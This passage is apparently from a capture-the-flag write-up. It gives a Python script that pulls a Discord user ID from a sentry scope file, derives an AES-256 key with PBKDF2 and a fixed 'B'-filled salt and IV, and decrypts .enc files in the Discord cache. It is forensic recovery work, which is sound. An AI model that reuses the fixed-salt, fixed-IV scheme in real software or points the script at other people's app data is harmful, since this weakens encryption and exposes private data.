    mode = AES-CBC  (PKCS#7 padding)

Run **from the directory that contains ./AppData/**.
"""

from pathlib import Path
import json, sys
from Cryptodome.Protocol.KDF import PBKDF2
from Cryptodome.Hash      import SHA1          # PBKDF2 default; explicit for clarity
from Cryptodome.Cipher    import AES
from Cryptodome.Util.Padding import unpad

# --------------------------------------------------------------------------- #
# 1)  Locate sentry file and cache directory (paths are case-sensitive on *nix)
# --------------------------------------------------------------------------- #
SENTRY = Path("AppData/Roaming/discord/sentry/scope_v3.json")
CACHE  = Path("AppData/Roaming/discord/Cache/Cache_Data")

if not SENTRY.is_file():
    sys.exit(f"[!] Can’t find {SENTRY}")
if not CACHE.is_dir():
    sys.exit(f"[!] Can’t find {CACHE}")

# --------------------------------------------------------------------------- #
# 2)  Extract Discord user-ID and derive the AES key
# --------------------------------------------------------------------------- #
try:
    user_id = json.loads(SENTRY.read_text())["scope"]["user"]["id"]
except (KeyError, json.JSONDecodeError) as e:
    sys.exit(f"[!] Failed to read user-ID from {SENTRY}: {e}")

salt = iv = b"B" * 16
key  = PBKDF2(str(user_id).encode(), salt, dkLen=32,
              count=1_000_000, hmac_hash_module=SHA1)

print(f"[+] Discord user-ID : {user_id}")
print(f"[+] AES-256 key    : {key.hex()[:16]}…  (PBKDF2-SHA-1, 1 000 000 iters)")
print(f"[+] Decrypting every *.enc under {CACHE} …\n")

# --------------------------------------------------------------------------- #
# 3)  Walk the cache and restore each file
# --------------------------------------------------------------------------- #
ok = bad = 0
for enc in CACHE.rglob("*.enc"):
    try:
        plaintext = unpad(
            AES.new(key, AES.MODE_CBC, iv).decrypt(enc.read_bytes()),
            16)
        dec = enc.with_suffix(".dec")
        dec.write_bytes(plaintext)
        ok += 1
        print("✔", enc.relative_to(CACHE.parent), "→", dec.name)
    except ValueError:          # bad padding  → corrupt or wrong key
        bad += 1

print(f"\n[+] finished: {ok} decrypted, {bad} failed")

PreviousScriptCTF 2025 NextGoogleCTF 2025

Last updated 6 months ago

Was this helpful?